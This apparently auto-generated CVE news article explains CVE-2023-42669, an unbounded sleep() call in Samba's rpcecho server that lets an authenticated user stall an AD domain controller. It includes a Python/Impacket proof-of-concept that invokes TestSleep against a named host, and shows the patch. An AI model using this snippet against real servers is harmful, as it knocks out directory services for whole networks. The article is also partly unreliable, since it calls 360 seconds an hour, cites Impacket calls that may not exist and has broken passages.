CVE CyberSecurity Database News

CVE-2023-42669 - Samba rpcecho Vulnerability - How a Sleep Function Can Take Down Your Active Directory

Poster -

CVE-2023-42669 affects the "rpcecho" development server in Samba, a popular open-source suite that implements the SMB/CIFS networking protocol and is widely used for file and print services across many networks. This CVE describes a vulnerability that is simple in nature but has severe consequences—a sleep function that can block the entire service, resulting in a full denial of service (DoS) on the Active Directory Domain Controller (AD DC).

and how an attacker can easily exploit it.

We’ll also provide reference links at the end for further reading.

What is Samba’s "rpcecho" server?

The "rpcecho" server is a special, non-Windows Remote Procedure Call (RPC) server. It is not designed for normal user operations—it’s mainly used to test different pieces of Samba’s DCE/RPC stack. However, it is included by default on some samba test builds and even on some actual product installations, where it’s supposed to be harmless.

Unfortunately, "rpcecho" runs within the main RPC task. This means if it gets blocked, so does everything else that relies on that main task—potentially bringing down the whole AD DC.

The Problem: Blocking RPC with a Sleep Call

At the heart of this bug is the dcesrv_echo_TestSleep() function. Inside this function is a classic "footgun": the sleep() call.

/* Code snippet from source4/rpc_server/echo/dcesrv_echo.c */

WERROR dcesrv_echo_TestSleep(struct dcesrv_call_state *dce_call, TALLOC_CTX *mem_ctx, struct echo_TestSleep *r)
{
    // ...snip...
    if (r->in.sleep_seconds) {
        sleep(r->in.sleep_seconds); // <-- Any requested seconds!
    }
    // ...snip...
    return WERR_OK;
}

Whenever an authenticated user calls the TestSleep RPC function—and specifies some number of seconds—the server will pause for that many seconds. There’s no upper limit on how long the server will sleep (at least, none is enforced directly here).

It operates in the main RPC task.

- Blocking this worker blocks everyone and everything else using DCE/RPC in Samba.

Exploitation: How Easy is it to Trigger?

Probably the most striking aspect of CVE-2023-42669 is how easy exploiting it is.

Attacker has authentication to Samba AD DC (usually via a domain user).

- The rpcecho service is available (check your Samba build/config).

The attacker authenticates to the Samba service (even a regular user account works).

2. They invoke the dcesrv_echo_TestSleep RPC function with a very large number of seconds (e.g., 360 for one hour).
3. The rpc worker thread goes to sleep and blocks all other DCE/RPC calls.

Proof-of-concept Exploit (Python + Impacket)

Here’s a simple python snippet using impacket to invoke the vulnerable function:

from impacket.dcerpc.v5 import transport, rpcecho
from impacket.dcerpc.v5.rpcecho import ECHO_UUID, ECHO_VERSION

# Set the connection string as needed
username = 'user'
password = 'password'
domain = 'DOMAIN'
target = 'dc.sambaserver.com'

string_binding = r'ncacn_np:%s[\pipe\rpcecho]' % target
rpc_transport = transport.DCERPCTransportFactory(string_binding)
rpc_transport.set_credentials(username, password, domain, '', '')

dce = rpc_transport.get_dce_rpc()
dce.connect()
dce.bind(ECHO_UUID, ECHO_VERSION)

# Sleep for 360 seconds (1 hour)!
rpcecho.hDRCEcho_TestSleep(dce, 360)

# DCE/RPC server will now sleep, all DCE/RPC requests hang!

There’s nothing to stop users from requesting 10,000 seconds or more.

As documented in Samba’s Security Advisory:

> “As the ‘rpcecho’ server runs with only one worker in the main RPC task, calls into the ‘rpcecho’ server can block indefinitely for a caller-specified time. This causes most other services to become unavailable, allowing a complete denial of service on the AD DC.”

If the Samba instance is production, even used only for test/dev, this could cause critical outages.

Mitigations

Samba has issued patches for this bug. Here’s how they fixed it:

-	sleep(r->in.sleep_seconds);
+	if (r->in.sleep_seconds < 10) {
+		sleep(r->in.sleep_seconds);
+	}

This limits the maximum sleep to 9 seconds—enough for developers to test, but not enough for abuse.

References and Further Reading

- Samba Security Advisory for CVE-2023-42669
- Upstream Patch on GitLab
- Impacket project
- Samba RPC Internal Document

CVE-2023-42669 is a simple but critical DoS bug in Samba’s "rpcecho" test server.

- Any authenticated user can cause the main DCE/RPC worker thread to sleep, blocking all other services.
- Patch your Samba now, disable unnecessary services, and never underestimate the damage a single rogue sleep() can cause!


*Stay safe, and always keep your testing code out of production—at least, until you’re sure it can’t take down your system with one call.*

Timeline

Published on: 11/06/2023 07:15:09 UTC
Last modified on: 11/24/2023 09:15:08 UTC